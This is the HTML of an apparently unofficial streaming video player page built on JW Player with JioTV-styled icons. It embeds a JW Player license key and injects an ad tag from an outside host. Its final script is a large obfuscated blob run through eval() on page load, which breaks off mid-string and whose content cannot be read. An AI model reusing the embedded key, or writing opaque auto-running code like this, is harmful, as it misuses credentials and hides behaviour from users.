

<html>
<head>
  <meta charset="utf-8">

<script>

//Main monetag
// Get the current time in milliseconds
var currentTimestamp = new Date().getTime();
// Get the last shown time from the local storage
var lastShownTimestamp = localStorage.getItem('lastShownTimestamp');

// Check if it has been more than a day since the last time the code was shown
if (!lastShownTimestamp || currentTimestamp - lastShownTimestamp > 12 * 60 * 60 * 1000) {
    // Show the script tag
    var scriptUrl = "https://inklinkor.com/tag.min.js";
    var zoneId = 6249905;

    // generate the script tag
    var script = document.createElement('script');
    script.setAttribute('src', scriptUrl);
    script.setAttribute('data-zone', zoneId);

    // append the script tag to the body or document element
    (document.body || document.documentElement).appendChild(script);

    // Store the current time as the last shown time in the local storage
    localStorage.setItem('lastShownTimestamp', currentTimestamp);
}

</script>

    <meta name="viewport" content="width=device-width, initial-scale=1">
<title>PLAYER</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="author" content="MR.NITROX">
<meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=no" />
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<script type='text/javascript' src='https://content.jwplatform.com/libraries/IDzF9Zmk.js'></script>
<script type="text/javascript">jwplayer.key = 'Khpp2dHxlBJHC8MCmLnBuV2jK/DwDnJMniwF6EO9HC/riJ712ZmbHg==';</script>
<link rel="stylesheet" href="https://cdn.plyr.io/3.6.2/plyr.css" />
<script src="https://cdn.plyr.io/3.6.3/plyr.js"></script>
<script type='text/javascript' src='https://content.jwplatform.com/libraries/IDzF9Zmk.js'></script>
<script type="text/javascript">jwplayer.key = 'Khpp2dHxlBJHC8MCmLnBuV2jK/DwDnJMniwF6EO9HC/riJ712ZmbHg==';</script>
<script src="jwplayer.js"></script>
<body>
<style>
        html {
            font-family: Poppins;
            background: #000;
            margin: 0;
            padding: 0
        }
        
        #myElement{
        position:reletive;
        width:100%!important;
        height:100%!important
            
                
        }
        
    .jw-state-paused .jw-svg-icon-play path {
        display: none;
    }

    .jw-state-paused .jw-svg-icon-play {
        background-image: url("https://cdn.jsdelivr.net/gh/Hadi0609/JioTvAssets@v1.0/assets/jwp/play.svg");
        background-size: contain;
        background-repeat: no-repeat;
    }

    .jw-state-paused .jw-icon-playback:hover .jw-svg-icon-play {
        background-image: url("https://cdn.jsdelivr.net/gh/Hadi0609/JioTvAssets@v1.0/assets/jwp/play-hover.svg");
    }

    .jw-svg-icon-pause path {
        display: none;
    }

    .jw-svg-icon-pause {
        background-image: url("https://cdn.jsdelivr.net/gh/Hadi0609/JioTvAssets@v1.0/assets/jwp/pause.svg");
        background-size: contain;
        background-repeat: no-repeat;
    }

    .jw-icon-playback:hover .jw-svg-icon-pause {
        background-image: url("https://cdn.jsdelivr.net/gh/Hadi0609/JioTvAssets@v1.0/assets/jwp/pause-hover.svg");
    }

    .jw-svg-icon-buffer path {
        display: none;
    }

    .jw-svg-icon-buffer {
        background-image: url("https://cdn.jsdelivr.net/gh/Hadi0609/JioTvAssets@v1.0/assets/jwp/buffer.svg");
        background-size: contain;
        background-repeat: no-repeat;
    }

    .jw-svg-icon-replay path {
        display: none;
    }

    .jw-svg-icon-replay {
        background-image: url("https://cdn.jsdelivr.net/gh/Hadi0609/JioTvAssets@v1.0/assets/jwp/replay.svg");
        background-size: contain;
        background-repeat: no-repeat;
    }

    .jw-icon-replay:hover .jw-svg-icon-replay {
        background-image: url("https://cdn.jsdelivr.net/gh/Hadi0609/JioTvAssets@v1.0/assets/jwp/replay-hover.svg");
    }

    .jw-svg-icon-rewind path {
        display: none;
    }

    .jw-svg-icon-rewind {
        background-image: url("https://cdn.jsdelivr.net/gh/Hadi0609/JioTvAssets@v1.0/assets/jwp/rewind.svg");
        background-size: contain;
        background-repeat: no-repeat;
    }

    .jw-icon-rewind:hover .jw-svg-icon-rewind {
        background-image: url("https://cdn.jsdelivr.net/gh/Hadi0609/JioTvAssets@v1.0/assets/jwp/rewind-hover.svg");
    }

    .jw-svg-icon-next path {
        display: none;
    }

    .jw-svg-icon-next {
        background-image: url("https://cdn.jsdelivr.net/gh/Hadi0609/JioTvAssets@v1.0/assets/jwp/next.svg");
        background-size: contain;
        background-repeat: no-repeat;
    }

    .jw-icon-next:hover .jw-svg-icon-next {
        background-image: url("https://cdn.jsdelivr.net/gh/Hadi0609/JioTvAssets@v1.0/assets/jwp/next-hover.svg");
    }

    .jw-svg-icon-volume-100 path {
        display: none;
    }

    .jw-svg-icon-volume-100 {
        background-image: url("https://cdn.jsdelivr.net/gh/Hadi0609/JioTvAssets@v1.0/assets/jwp/volume-on.svg");
        background-size: contain;
        background-repeat: no-repeat;
    }

    .jw-icon-volume:hover .jw-svg-icon-volume-100 {
        background-image: url("https://cdn.jsdelivr.net/gh/Hadi0609/JioTvAssets@v1.0/assets/jwp/volume-on-hover.svg");
    }

    .jw-svg-icon-volume-0 path {
        display: none;
    }

    .jw-svg-icon-volume-0 {
        background-image: url("https://cdn.jsdelivr.net/gh/Hadi0609/JioTvAssets@v1.0/assets/jwp/volume-off.svg");
        background-size: contain;
        background-repeat: no-repeat;
    }

    .jw-icon-volume:hover .jw-svg-icon-volume-0 {
        background-image: url("https://cdn.jsdelivr.net/gh/Hadi0609/JioTvAssets@v1.0/assets/jwp/volume-off-hover.svg");
    }

    .jw-svg-icon-cc-off path {
        display: none;
    }

    .jw-svg-icon-cc-off {
        background-image: url("https://cdn.jsdelivr.net/gh/Hadi0609/JioTvAssets@v1.0/assets/jwp/captions.svg");
        background-size: contain;
        background-repeat: no-repeat;
    }

    .jw-icon-cc-off:hover .jw-svg-icon-cc-off {
        background-image: url("https://cdn.jsdelivr.net/gh/Hadi0609/JioTvAssets@v1.0/assets/jwp/captions-hover.svg");
    }

    .jw-svg-icon-playlist path {
        display: none;
    }

    .jw-svg-icon-playlist {
        background-image: url("https://cdn.jsdelivr.net/gh/Hadi0609/JioTvAssets@v1.0/assets/jwp/playlist.svg");
        background-size: contain;
        background-repeat: no-repeat;
    }

    .jw-playlist-btn:hover .jw-svg-icon-playlist {
        background-image: url("https://cdn.jsdelivr.net/gh/Hadi0609/JioTvAssets@v1.0/assets/jwp/playlist-hover.svg");
    }

    .jw-svg-icon-settings path {
        display: none;
    }

    .jw-svg-icon-settings {
        background-image: url("https://cdn.jsdelivr.net/gh/Hadi0609/JioTvAssets@v1.0/assets/jwp/settings.svg");
        background-size: contain;
        background-repeat: no-repeat;
    }

    .jw-icon-settings:hover .jw-svg-icon-settings {
        background-image: url("https://cdn.jsdelivr.net/gh/Hadi0609/JioTvAssets@v1.0/assets/jwp/settings-hover.svg");
    }

    .jw-svg-icon-quality-100 path {
        display: none;
    }

    .jw-svg-icon-quality-100 {
        background-image: url("https://cdn.jsdelivr.net/gh/Hadi0609/JioTvAssets@v1.0/assets/jwp/quality.svg");
        background-size: contain;
        background-repeat: no-repeat;
    }

    .jw-settings-quality:hover .jw-svg-icon-quality-100 {
        background-image: url("https://cdn.jsdelivr.net/gh/Hadi0609/JioTvAssets@v1.0/assets/jwp/quality-hover.svg");
    }

    .jw-svg-icon-close path {
        display: none;
    }

    .jw-svg-icon-close {
        background-image: url("https://cdn.jsdelivr.net/gh/Hadi0609/JioTvAssets@v1.0/assets/jwp/close.svg");
        background-size: contain;
        background-repeat: no-repeat;
    }

    .jw-settings-close:hover .jw-svg-icon-close {
        background-image: url("https://cdn.jsdelivr.net/gh/Hadi0609/JioTvAssets@v1.0/assets/jwp/close-hover.svg");
    }

    .jw-svg-icon-fullscreen-on path {
        display: none;
    }

    .jw-svg-icon-fullscreen-on {
        background-image: url("https://cdn.jsdelivr.net/gh/Hadi0609/JioTvAssets@v1.0/assets/jwp/fullscreen-on.svg");
        background-size: contain;
        background-repeat: no-repeat;
    }

    .jw-icon-fullscreen:hover .jw-svg-icon-fullscreen-on {
        background-image: url("https://cdn.jsdelivr.net/gh/Hadi0609/JioTvAssets@v1.0/assets/jwp/fullscreen-on-hover.svg");
    }

    .jw-svg-icon-fullscreen-off path {
        display: none;
    }

    .jw-svg-icon-fullscreen-off {
        background-image: url("https://cdn.jsdelivr.net/gh/Hadi0609/JioTvAssets@v1.0/assets/jwp/fullscreen-off.svg");
        background-size: contain;
        background-repeat: no-repeat;
    }

    .jw-icon-fullscreen:hover .jw-svg-icon-fullscreen-off {
        background-image: url("https://cdn.jsdelivr.net/gh/Hadi0609/JioTvAssets@v1.0/assets/jwp/fullscreen-off-hover.svg");
    }

    .loading {
        position: fixed;
        top: 0;
        left: 0;
        width: 100%;
        height: 100%;
        background: #000;
        z-index: 9999;
    }

    .loading-text {
        position: absolute;
        top: 0;
        bottom: 0;
        left: 0;
        right: 0;
        margin: auto;
        text-align: center;
        width: 100%;
        height: 100px;
        line-height: 100px;
    }


    .loading-text span {
        display: inline-block;
        margin: 0 5px;
        font-size: 50px;
        font-weight: bold;
        color: #00b3ff;
        font-family: 'Quattrocento Sans', sans-serif;
    }

    .loading-text span:nth-child(1) {
        filter: blur(0px);
        animation: blur-text 1.5s 0s infinite linear alternate;
    }

    .loading-text span:nth-child(2) {
        filter: blur(0px);
        animation: blur-text 1.5s 0.2s infinite linear alternate;
    }

    .loading-text span:nth-child(3) {
        filter: blur(0px);
        animation: blur-text 1.5s 0.4s infinite linear alternate;
    }

    .loading-text span:nth-child(4) {
        filter: blur(0px);
        animation: blur-text 1.5s 0.6s infinite linear alternate;
    }

    .loading-text span:nth-child(5) {
        filter: blur(0px);
        animation: blur-text 1.5s 0.8s infinite linear alternate;
    }

    .loading-text span:nth-child(6) {
        filter: blur(0px);
        animation: blur-text 1.5s 1s infinite linear alternate;
    }

    .loading-text span:nth-child(7) {
        filter: blur(0px);
        animation: blur-text 1.5s 1.2s infinite linear alternate;
    }

    .loading-text span:nth-child(8) {
        filter: blur(0px);
        animation: blur-text 1.5s 1.4s infinite linear alternate;
    }

    @keyframes blur-text {
        0% {
            filter: blur(0px);
        }

        100% {
            filter: blur(4px);
        }
    }
    #videoContainer {
        position:absolute;
        width:100%!important;
        height:100%!important
    }
    
    .scrollbar-track-y {
  background: #131720 !important;
  top: 10px !important;
  bottom: 10px !important;
  height: auto !important;
  width: 4px !important;
  border-radius: 4px !important;
  right: 10px !important;
  overflow: hidden;
}
.scrollbar-thumb-y {
  background: #2f80ed !important;
  width: 4px !important;
  border-radius: 4px !important;
}
.scrollbar-track-x {
  background: #131720 !important;
  left: 10px !important;
  right: 10px !important;
  height: 4px !important;
  width: auto !important;
  border-radius: 4px !important;
  bottom: 10px !important;
  overflow: hidden;
}
.scrollbar-thumb-x {
  background: #2f80ed !important;
  height: 4px !important;
  border-radius: 4px !important;
}
</style>








<script src="https://content.jwplatform.com/libraries/SAHhwvZq.js"></script>

<div id="myElement"></div>
<script>var _0xc32e=["","split","0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ+/","slice","indexOf","","",".","pow","reduce","reverse","0"];function _0xe94c(d,e,f){var g=_0xc32e[2][_0xc32e[1]](_0xc32e[0]);var h=g[_0xc32e[3]](0,e);var i=g[_0xc32e[3]](0,f);var j=d[_0xc32e[1]](_0xc32e[0])[_0xc32e[10]]()[_0xc32e[9]](function(a,b,c){if(h[_0xc32e[4]](b)!==-1)return a+=h[_0xc32e[4]](b)*(Math[_0xc32e[8]](e,c))},0);var k=_0xc32e[0];while(j>0){k=i[j%f]+k;j=(j-(j%f))/f}return k||_0xc32e[11]}eval(function(h,u,n,t,e,r){r="";for(var i=0,len=h.length;i<len;i++){var s="";while(h[i]!==n[e]){s+=h[i];i++}for(var j=0;j<n.length;j++)s=s.replace(new RegExp(n[j],"g"),j);r+=String.fromCharCode(_0xe94c(s,e,10)-t)}return decodeURIComponent(escape(r))}("ajIEaVDEajVEVDhEaDsEVahEajhEaVaEVjgEVjDEaVgEVggEaDaEVVVEVVVEVajEVVVEajaEaahEaajEaaDEajjEVVVEVajEVVVEVahEVjDEVjVEVjaEVjjEVjgEVjIEVjsEVjhEVgDEaVDEaVVEaVaEaVjEaVgEaVIEaVsEaVhEaaDEaaVEaaaEaajEaagEaaIEaasEaahEajDEajVEajaEajjEajgEajIEajsEajhEagDEagVEVIDEVIVEVIaEVIjEVIgEVIIEVIsEVIhEVsDEVsVEVsaEVsjEVsgEVsIEVssEVshEVhDEVhVEVhaEVhjEVhgEVhIEVhsEVhhEaDDEaDVEVaaEVasEVVVEVajEVVVEajaEaajEaaDEaVaEaVgEVVVEVajEVVVEaaDEaaIEaVjEaVgEajhEVssEaVIEVVVEVajEVVVEVVVEVajEVVVEVVVEVajEVVVEVaIEVVVEVajEVVVEaahEaasEajsEVVVEVajEVVVEajVEaVgEaVjEajgEaVaEaVgEVVVEVajEVVVEajVEaVgEajIEaVgEajVEajaEaVgEVVVEVajEVVVEVahEVVVEaDgEVgaEaVIEajgEaaIEaVaEajjEaaDEaasEaaIEVDhEaDsEVahEajhEaVgEVjgEVjVEaVaEVVhEaVjEVajEaVgEVajEaVIEVaDEagaEajIEaVDEajVEVDhEaVsEVggEaDsEVahEajhEaVaEVjgEVjDEaVgEaDaEVjVEaDgEaDaEaDsEVahEajhEaVaEVjgEVjDEaVgEaDaEVjDEaDgEaDgEVVhEaDsEVahEajhEaVaEVjgEVjDEaVgEaDaEVahEaDgEVaDEVgaEajIEaVDEajVEVDhEaVhEVggEaVsEaDaEaDsEVahEajhEaVaEVjgEVjDEaVgEaDaEVjaEaDgEaDgEVVhEVahEVajEaVgEVaDEVgaEajIEaVDEajVEVDhEaaDEVggEaVsEaDaEaDsEVahEajhEaVaEVjgEVjDEaVgEaDaEVjaEaDgEaDgEVVhEVahEVajEaVIEVaDEVgaEajIEaVDEajVEVDhEaaVEVggEaVjEaDaEaDsEVahEajhEaVaEVjgEVjDEaVgEaDaEVjDEaDgEaDgEVVhEaDsEVahEajhEaVaEVjgEVjDEaVgEaDaEVahEaDgEVaDEaDaEaDsEVahEajhEaVaEVjgEVjDEaVgEaDaEVjDEVahEaDgEaDgEVVhEVaDEaDaEaDsEVahEajhEaVaEVjgEVjDEaVgEaDaEVgDEaDgEaDgEVVhEaVIEajgEaaIEaVaEajjEaaDEaasEaaIEVVhEaVDEVajEaVVEVajEaVaEVaDEagaEaaDEaVIEVVhEaVhEaDaEaDsEVahEajhEaVaEVjgEVjDEaVgEaDaEVjjEaDgEaDgEVVhEaVVEVaDEVVDEVggEVggEVagEVjDEVaDEajVEaVgEajjEajgEajVEaaIEVDhEaVDEVaaEVggEaVhEaDaEaDsEVahEajhEaVaEVjgEVjDEaVgEaDaEVjjEaDgEaDgEVVhEaVVEVaDEVaVEVVhEVsgEaVDEajjEaVhEaDaEaDsEVahEajhEaVaEVjgEVjDEaVgEaDaEVjhEaDgEaDgEVVhEaVgEVajEaVaEVaDEVaDEaggEVajEVahEVaDEVgaEajIEaVDEajVEVDhEaaaEVggEaDsEVahEajhEaVaEVjgEVjDEaVgEaDaEVahEaDgEVgaEajsEaVhEaaDEaajEaVgEVVhEaaVEVgIEVahEVaDEagaEaaaEVggEaaDEaDaEaaVEVVgEaVIEaDgEVaaEaaaEVgaEaaVEVggEVVhEaaVEVagEVVhEaaVEVVgEaVIEVaDEVaDEVasEaVIEaggEajVEaVgEajjEajgEajVEaaIEVDhEaaaEagjEagjEaDsEVahEajhEaVaEVjgEVjDEaVgEaDaEVjDEVjDEaDgEaggEaVgEajIEaVDEaajEVVhEaVIEajgEaaIEaVaEajjEaaDEaasEaaIEVVhEaVhEVajEajgEVajEaaIEVajEajjEVajEaVgEVajEajVEVaDEagaEajVEVggEVVVEVVVEVgaEaVIEaasEajVEVVhEajIEaVDEajVEVDhEaaDEVggEVahEVajEaajEaVgEaaIEVggEaVhEVaIEaajEaVgEaaIEaVsEajjEaVhEVgaEaaDEVgjEaajEaVgEaaIEVgaEaaDEVaaEVaaEVaDEagaEajIEaVDEajVEVDhEajaEVggEVVVEVVVEVgaEajsEaVhEaaDEaajEaVgEVVhEaVhEaDaEaaDEaDgEVVDEVggEVggEaaIEaDaEaVgEaDgEVaDEagaEajaEVaaEVggEaVhEaDaEaaDEaDgEVgaEaaDEVaaEVaaEaggEaVIEaasEajVEVVhEajIEaVDEajVEVDhEaaVEVggEVahEVgaEaaVEVgjEaaIEVaIEaajEaVgEaaIEaVsEajjEaVhEVgaEaaVEVaaEVaaEVaDEajaEVggEajaEVaIEajVEaVgEaahEaajEaVDEaVaEaVgEVVhEaaIEaVgEajsEVDhEVhVEaVgEaVsEVIgEajhEaahEVVhEaaIEaDaEaaVEaDgEVajEVVVEaVsEVVVEVaDEVajEaaVEVaDEVgaEajVEVaaEVggEVhaEajjEajVEaaDEaaIEaVsEVaIEaVIEajVEaasEaagEVIaEaVhEaVDEajVEVIaEaasEaVjEaVgEVVhEaDsEVahEajhEaVgEVjgEVjVEaVaEVVhEajaEVajEaVgEVajEVjDEVahEVaDEVagEajjEVaDEaggEajVEaVgEajjEajgEajVEaaIEVDhEaVjEaVgEaVaEaasEaVjEaVgEVhgEVhVEVsDEVIaEaasEaagEaahEaasEaaIEaVgEaaIEajjEVVhEaVgEajaEaVaEaVDEaahEaVgEVVhEajVEVaDEVaDEaggEVVhEVVVEVhVEaasEajgEVIDEVhVEajsEajjEVIDEVhVEaasEajjEVIDEVhVEaasEVhVEVIDEVhVEVhVEajsEVIDEVhVEajjEVhhEVIDEVhVEajDEVhVEVIDEVhVEajsEVhhEVIDEVhhEVhhEaasEVIDEVhhEajgEajsEVIDEVhVEaasEajDEVIDEVhVEajjEVhhEVIDEVhhEajsEajsEVIDEVhVEaasEVhVEVIDEVhVEajDEVhVEVIDEVhVEaasEajDEVIDEVhVEajDEVhVEVIDEVhVEaasEaasEVIDEVhVEajsEajDEVIDEVhhEajgEajsEVIDEVhhEVhhEajsEVIDEVhhEVhVEajDEVIDEVhVEajsEVhVEVIDEVhVEajDEVhVEVIDEVhVEajsEajDEVIDEVhVEajsEaasEVIDEVhVEaasEajjEVIDEVhhEVhhEaasEVIDEVhVEajjEajDEVIDEVhhEajgEajDEVIDEVhVEajsEajjEVIDEVhVEajDEajjEVIDEVhVEajDEVhhEVIDEVhVEajsEajDEVIDEVhVEajDEajsEVIDEVhhEaasEVhhEVIDEVhhEajgEajDEVIDEVhhEajgEajsEVIDEVhhEVhVEajjEVIDEVhhEVhVEajsEVIDEVhhEVhVEajsEVIDEVhhEVhhEVhhEVIDEVhhEajgEajsEVIDEVhhEVhVEVhhEVIDEVhhEajgEajDEVIDEVhVEaasEajDEVIDEVhVEajsEaasEVIDEVhVEajsEajDEVIDEVhVEajDEVhVEVIDEVhhEaasEVhhEVIDEVhhEajgEajsEVIDEVhVEajDEajDEVIDEVhVEVhVEajsEVIDEVhVEaasEVhVEVIDEVhVEajsEVhVEVIDEVhVEajDEVhVEVIDEVhhEajgEajsEVIDEVhhEVhVEVhhEVIDEVhhEajgEajDEVIDEVhVEajsEVhVEVIDEVhVEajsEajDEVIDEVhVEajsEVhhEVIDEVhVEajDEVhVEVIDEVhVEajsEajDEVIDEVhVEajDEajgEVIDEVhVEajDEajsEVIDEVhVEajDEajjEVIDEVhVEaasEaasEVIDEVhVEajDEaasEVIDEVhhEaasEVhhEVIDEVhhEajgEajDEVIDEVhhEajgEajsEVIDEVhVEajDEVhVEVIDEVhVEajjEajgEVIDEVhVEVhVEajsEVIDEVhVEajDEajgEVIDEVhVEajsEajDEVIDEVhVEajDEajDEVIDEVhVEajDEajjEVIDEVhVEajsEajDEVIDEVhhEajgEajsEVIDEVhhEVhVEVhhEVIDEVhhEajgEajDEVIDEVhVEVhVEajsEVIDEVhVEajsEVhVEVIDEVhVEaasEajjEVIDEVhVEajDEVhVEVIDEVhVEajDEajgEVIDEVhVEajsEajDEVIDEVhVEajsEVhhEVIDEVhVEVhVEajsEVIDEVhVEajsEajDEVIDEVhVEajDEajjEVIDEVhVEaasEajsEVIDEVhhEaasEVhhEVIDEVhhEajgEajDEVIDEVhhEajgEajsEVIDEVhhEVhVEajjEVIDEVhhEajDEaasEVIDEVhhEaasEVhhEVIDEVhhEaasEajgEVIDEVhhEajgEajsEVIDEVhhEVhVEVhhEVIDEVhhEajgEajDEVIDEVhVEajDEajDEVIDEVhVEajDEajjEVIDEVhVEaasEVhVEVIDEVhVEajDEVhVEVIDEVhhEaasEVhhEVIDEVhhEajgEajDEVIDEVhhEajgEajsEVIDEVhVEajDEajsEVIDEVhVEajsEajDEVIDEVhVEajsEajDEVIDEVhVEaasEajjEVIDEVhVEajsEVhVEVIDEVhhEaasEVhhEVIDEVhhEVhVEaasEVIDEVhhEVhVEaasEVIDEVhVEaasEVhVEVIDEVhVEajDEajjEVIDEVhVEaasEaasEVIDEVhVEajDEVhVEVIDEVhVEVhVEajsEVIDEVhVEajsEVhhEVIDEVhhEVhVEVhVEVIDEVhVEaasEaasEVIDEVhVEaasEajsEVIDEVhVEajsEajsEVIDEVhVEajDEajjEVIDEVhhEVhVEajDEVIDEVhVEajsEVhVEVIDEVhVEajsEajDEVIDEVhVEajsEajsEVIDEVhVEVhVEajsEVIDEVhVEajDEajgEVIDEVhVEajDEVhhEVIDEVhVEaasEaasEVIDEVhhEVhVEajDEVIDEVhVEajsEVhVEVIDEVhVEaasEajjEVIDEVhVEajDEVhVEVIDEVhVEajDEajgEVIDEVhVEajsEajDEVIDEVhVEajsEVhhEVIDEVhVEajsEaasEVIDEVhVEaasEajDEVIDEVhhEVhVEajDEVIDEVhVEajDEajgEVIDEVhVEaasEajsEVIDEVhVEaasEajDEVIDEVhhEVhVEaasEVIDEVhhEajjEajsEVIDEVhhEajjEVhVEVIDEVhVEVhhEVhhEVIDEVhhEajsEajsEVIDEVhhEVhVEaasEVIDEVhhEVhVEajjEVIDEVhhEVhVEajjEVIDEVhhEajDEVhhEVIDEVhhEVhVEajjEVIDEVhhEVhVEaasEVIDEVhVEajDEVhhEVIDEVhVEVhVEajsEVIDEVhVEajsEVhVEVIDEVhVEajDEajsEVIDEVhhEVhVEaasEVIDEVhVEajDEajgEVIDEVhVEajDEVhVEVIDEVhVEaasEaasEVIDEVhVEajDEajgEVIDEVhhEVhVEaasEVIDEVhVEVhhEVhVEVIDEVhhEajjEajsEVIDEVhhEajjEajsEVIDEVhVEajgEVhhEVIDEVhhEajjEVhhEVIDEVhhEajsEaasEVIDEVhVEVhVEajDEVIDEVhhEVhVEajjEVIDEVhhEVhVEajsEVIDEVhhEajDEVhhEVIDEVhhEajDEaasEVIDEVhhEajDEVhVEVIDEVhhEVhVEaasEVIDEVhVEaasEajDEVIDEVhVEVhVEajsEVIDEVhVEaasEaasEVIDEVhVEajDEajjEVIDEVhVEajDEajDEVIDEVhVEajDEVhVEVIDEVhVEajsEVhVEVIDEVhVEajsEajDEVIDEVhhEVhVEajDEVIDEVhVEaasEajDEVIDEVhVEaasEajjEVIDEVhVEajDEVhhEVIDEVhhEajgEajsEVIDEVhhEVhVEVhhEVIDEVhhEajgEajDEVIDEVhVEajsEajDEVIDEVhVEajjEVhhEVIDEVhVEaasEajjEVIDEVhVEajDEVhVEVIDEVhhEaasEVhhEVIDEVhhEajgEajDEVIDEVhhEajgEajsEVIDEVhVEajDEVhhEVIDEVhVEVhVEajsEVIDEVhVEajsEVhVEVIDEVhVEajDEajsEVIDEVhhEajgEajsEVIDEVhhEVhVEVhhEVIDEVhhEajgEajDEVIDEVhVEajDEVhhEVIDEVhVEajsEVhhEVIDEVhVEaasEajDEVIDEVhhEaasEVhhEVIDEVhhEajgEajDEVIDEVhVEajjEajDEVIDEVhhEajgEajDEVIDEVhhEajgEajsEVIDEVhVEajDEajgEVIDEVhVEaasEVhVEVIDEVhVEajDEVhVEVIDEVhVEVhVEajsEVIDEVhVEajsEVhhEVIDEVhVEaasEVhhEVIDEVhVEajDEVhVEVIDEVhVEajjEVhhEVIDEVhhEajgEajsEVIDEVhhEaasEVhhEVIDEVhhEajgEajDEVIDEVhVEajjEajDEVIDEVhhEajgEajDEVIDEVhhEajgEajsEVIDEVhVEaasEVhhEVIDEVhVEajDEVhVEVIDEVhVEajjEVhhEVIDEVhhEajjEVhVEVIDEVhVEajDEVhhEVIDEVhhEajgEajsEVIDEVhhEaasEVhhEVIDEVhhEajgEajsEVIDEVhhEajDEaasEVIDEVhhEajDEaasEVIDEVhhEajDEajDEVIDEVhhEajDEVhhEVIDEVhVEajDEajgEVIDEVhhEVhVEajsEVIDEVhhEajDEajDEVIDEVhVEajDEVhVEVIDEVhhEajDEVhVEVIDEVhhEajDEajgEVIDEVhVEajDEajDEVIDEVhVEajDEajgEVIDEVhhEajDEVhVEVIDEVhVEajDEajDEVIDEVhVEVhVEajsEVIDEVhVEajDEajgEVIDEVhhEajDEajjEVIDEVhVEajDEajDEVIDEVhhEajDEVhVEVIDEVhhEaasEajgEVIDEVhVEajDEVhhEVIDEVhhEajDEajsEVIDEVhVEajDEajgEVIDEVhVEVhVEajjEVIDEVhVEajDEajDEVIDEVhhEaasEajgEVIDEVhhEaasEajgEVIDEVhhEajDEVhVEVIDEVhhEaasEajgEVIDEVhhEajDEajjEVIDEVhVEajDEajDEVIDEVhVEajDEVhVEVIDEVhhEajgEajsEVIDEVhhEVhVEVhhEVIDEVhhEajgEajsEVIDEVhVEaasEVhhEVIDEVhVEajDEVhVEVIDEVhVEajjEVhhEVIDEVhhEajgEajsEVIDEVhhEaasEVhhEVIDEVhhEajgEajsEVIDEVhhEajDEVhhEVIDEVhVEVhVEajjEVIDEVhhEajDEajjEVIDEVhhEajDEajjEVIDEVhVEajDEajDEVIDEVhhEajDEajgEVIDEVhVEajDEajgEVIDEVhVEajDEajDEVIDEVhVEajDEajDEVIDEVhhEajDEVhhEVIDEVhVEVhVEajsEVIDEVhVEajDEajDEVIDEVhVEajDEajDEVIDEVhVEajDEVhVEVIDEVhVEajDEajDEVIDEVhhEajDEajgEVIDEVhhEVhVEajsEVIDEVhVEVhVEajjEVIDEVhhEajDEajgEVIDEVhhEajDEaasEVIDEVhhEajDEajDEVIDEVhVEajDEajgEVIDEVhhEajDEajjEVIDEVhhEajDEVhVEVIDEVhhEVhVEajsEVIDEVhVEVhVEajjEVIDEVhVEVhVEajsEVIDEVhVEajDEajDEVIDEVhVEajDEajgEVIDEVhhEVhVEajsEVIDEVhVEajDEajgEVIDEVhVEajDEajgEVIDEVhhEajgEajsEVIDEVhhEajgEajDEVIDEVhVEajjEajsEVIDEVhhEajgEajDEVIDEVhVEajjEajsEVIDEaasEVhVEVIDEVhVEajjEajsEVIDEVhhEVhhEajsEVIDEVhhEaasEVhVEVIDEVhhEajgEajDEVIDEVhVEajDEajjEVIDEVhVEajDEajDEVIDEVhhEajgEajDEVIDEVhhEVhhEaasEVIDEVhVEajDEajgEVIDEVhVEaasEajsEVIDEVhVEaasEaasEVIDEVhVEajDEajDEVIDEVhVEajDEajjEVIDEVhVEajsEVhhEVIDEVhVEaasEajDEVIDEVhhEVhhEaasEVIDEVhhEajgEajsEVIDEVhhEajjEajDEVIDEVhVEaasEajsEVIDEVhVEajDEajjEVIDEVhVEaasEaasEVIDEVhhEajgEajDEVIDEVhVEajgEVhhEVIDEVhVEajsEaasEVIDEVhVEajsEVhhEVIDEVhhEajgEajDEVIDEVhVEajgEajjEVIDEVhVEajDEVhVEVIDEVhVEaasEVhVEVIDEVhVEajDEVhVEVIDEVhVEajDEaasEVIDEVhVEajsEVhhEVIDEVhVEVhVEajsEVIDEVhVEaasEajDEVIDEVhhEajgEajDEVIDEVhhEajsEajDEVIDEVhVEajDEajsEVIDEVhVEVhVEajsEVIDEVhVEaasEaasEVIDEVhVEaasEaasEVIDEVhVEajDEVhVEVIDEVhVEaasEVhVEVIDEVhhEajgEajDEVIDEVhhEajsEajjEVIDEVhVEaasEajsEVIDEVhVEajsEVhhEVIDEVhhEajgEajDEVIDEVhhEajjEajsEVIDEVhVEVhVEajsEVIDEVhVEajsEajDEVIDEVhVEajDEVhVEVIDEVhVEajsEVhVEVIDEVhVEajsEajDEVIDEVhhEajgEajDEVIDEVhVEVhhEajgEVIDEVhVEaasEajjEVIDEVhVEajDEVhhEVIDEVhVEVhVEajsEVIDEVhVEajsEajDEVIDEVhVEajDEVhVEVIDEVhhEajgEajsEVIDEVhhEVhhEajsEVIDEVhhEajgEajDEVIDEVhhEaasEaasEVIDEVhhEaasEaasEVIDEVhhEajgEajDEVIDEVhVEajsEajDEVIDEVhVEajsEVhhEVIDEVhVEajsEaasEVIDEVhVEajDEVhVEVIDEVhhEVhhEajsEVIDEVhhEajgEajDEVIDEVhVEajjEajDEVIDEVhhEajgEajDEVIDEVhVEajsEajjEVIDEVhVEajDEajjEVIDEVhVEaasEaasEVIDEVhVEajDEVhhEVIDEVhVEaasEajsEVIDEVhVEajsEajjEVIDEVhhEVhVEajDEVIDEVhVEaasEajsEVIDEVhVEaasEajjEVIDEVhVEajDEVhVEVIDEVhVEaasEaasEVIDEVhhEVhhEaasEVIDEVhhEajgEajsEVIDEVhVEajDEajsEVIDEVhVEajsEajDEVIDEVhVEajsEajDEVIDEVhVEaasEajjEVIDEVhVEajsEVhVEVIDEVhhEaasEVhhEVIDEVhhEVhVEaasEVIDEVhhEVhVEaasEVIDEVhVEajsEajDEVIDEVhVEajDEVhVEVIDEVhVEaasEVhVEVIDEVhVEajDEVhVEVIDEVhVEajDEaasEVIDEVhVEajsEVhhEVIDEVhVEVhVEajsEVIDEVhVEaasEajDEVIDEVhhEVhVEajDEVIDEVhVEaasEajDEVIDEVhVEajDEVhVEVIDEVhhEVhVEaasEVIDEVhVEaasEVhVEVIDEVhVEajDEajjEVIDEVhVEajsEajsEVIDEVhVEajDEVhVEVIDEVhVEajsEVhVEVIDEVhVEaasEajjEVIDEVhVEaasEajsEVIDEVhVEajsEVhhEVIDEVhVEajsEajDEV